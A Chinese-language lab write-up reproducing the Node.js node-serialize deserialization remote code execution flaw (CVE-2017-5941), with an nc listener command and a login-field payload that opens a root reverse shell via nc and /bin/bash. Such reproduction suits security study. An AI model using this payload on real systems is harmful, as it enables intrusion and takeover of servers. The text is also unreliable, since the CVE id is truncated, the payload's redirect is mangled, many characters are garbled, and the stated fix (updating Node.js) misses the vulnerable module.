Node.js 反序列化漏洞远程执行代码（CVE-2017-5941）

2.1 摘要

2.1.1 漏洞介绍

• 漏洞名称： Exploiting Node.js deserialization bug for Remote Code Execution
• 漏洞CVE id： CVE-2017-594
• 漏洞类型： 代码执行
• Node.js存在反序列化远程代码执行漏洞，若不可信的数据传入unserrialize()函数，经过传递当即调用函数表达式(IIFE)的JavaScript对象能够实现任意代码执行。而且Node.js服务端必须存在接收序列的数据接口

2.1.2 漏洞环境

• 操做机：Kali Linux
• 目标机：CentOS 6.5

2.1.3 实验工具

• exp.txt:利用nodejs代码执行的代码文件。

2.2 漏洞复现

• 首先访问目标机器http://172.16.12.2能够看到一个存在node.js漏洞的登陆界面。
  
• 使用nc监听本地端口，用于接收漏洞环境的反弹Shell. nc -lv -p 8080 即监听本机8080端口
  

• 准备反序列化代码：_$$ND_FUNC$$_function (){require('child_process').exec('mknod backpipe p; nc <ip> <port> 0<backpipe | /bin/bash ]>backpipe')}()，修改里面的

• 用户名任意输入，将修改好的反序列化代码复制到密码框点击登陆便可。
  点击登陆后，以下图所示：利用成功。
  

• 已经反弹回一个shell，而且权限为root。
  

2.3 漏洞分析

• 使用0.0.4版本的node-serialize进行研究，成功利用的话，不可信输入传递到 unserialize()的时候能够执行任意代码。建立Payload最好使用同一模块的serialize()函数。 建立如下 JavaScript 对象，将其传入 serialize() 函数。
  

• 运行后获得如下输出：
  

• 获得序列化的字符串，能够经过unserialize()函数进行反序列化，但问题是代码执行不会发生，直到触发对应于对象的rce属性的函数。能够使用JavaScript的当即调用函数表达式（IIFE）来调用该函数。若是在函数体以后使用括号()，当对象被建立时，函数将被调用。 它的工做方式相似于C ++中的类构造函数。如今修改过的代码经 serialize() 函数立刻会被调用。
  
• 运行后获得如下输出：
  
• 成功执行，那么就有了下面的 exploit：
  
• 将其传入unserialize() 函数，触发代码执行。
  

• 运行后获得如下输出：
  

2.4 修复方案

• 更新到官方最新版本：https://nodejs.org/en/download/

2.5 思考总结

• 本实践实现了Node.js 反序列化漏洞远程执行代码的复现，并对漏洞原理进行了详细的分析。该漏洞本质上是构造Payload传入unserrialize()函数进行反序列化：使用JavaScript的当即调用函数表达式（IIFE），当对象被建立时，将 该JavaScript 对象传入 serialize() 函数，输出exploit将其传入unserialize() 函数，能够实现任意代码执行。危害不容小觑。